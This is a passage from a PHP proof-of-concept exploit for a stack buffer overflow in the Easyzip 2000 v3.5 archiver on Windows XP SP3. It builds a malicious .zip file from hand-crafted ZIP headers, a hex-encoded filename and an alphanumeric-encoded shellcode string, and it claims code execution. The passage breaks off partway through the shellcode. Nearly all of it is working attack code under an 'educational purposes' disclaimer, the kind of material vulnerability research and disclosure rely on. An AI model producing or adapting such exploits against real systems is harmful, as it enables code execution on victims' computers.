1 <?php
2 /*
3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
4 Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
5 Author: mr_me − http://net−ninja.net/
6 Download: http://www.thefreesite.com/ezip35.exe
7 Platform: Windows XP sp3
8 Advisory: http://www.corelan.be:8800/advisories.php?id=10−032
9 Greetz to: Corelan Security Team
10 http://www.corelan.be:8800/index.php/security/corelan−team−members/
11 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
12 Script provided ’as is’, without any warranty.
13 Use for educational purposes only.
14 Do not use this code to do anything illegal !
15
16 Note : you are not allowed to edit/modify this code.
17 If you do, Corelan cannot be held responsible for any damages this may cause.
18 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
19 ascii lowercase and payload space < 400 bytes, yet we still get code execution.
20 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
21 */
22
23 // local file header
24 $lf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
25 "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00";
26
27 // central directory file header
28 $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
29 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00".
30 "\x24\x00\x00\x00\x00\x00\x00\x00";
31
32 // end of central directory record
33 $efcdr_record = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
34 "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";
35
36 // filename
37 $_____name = "\x6D\x72\x5F\x6D\x65\x73\x5F\x73\x65\x63\x72\x65\x63\x74".
38 "\x5F\x70\x61\x73\x73\x77\x6F\x72\x64\x73\x2E\x74\x78\x74";
39
40 // corelan security team msgbox
41 $_____sc = "VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEON4F1W9M490R0P08654E2".
42 "M9Y2F64346K5K450115MN2G0N0B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W".
43 "343QO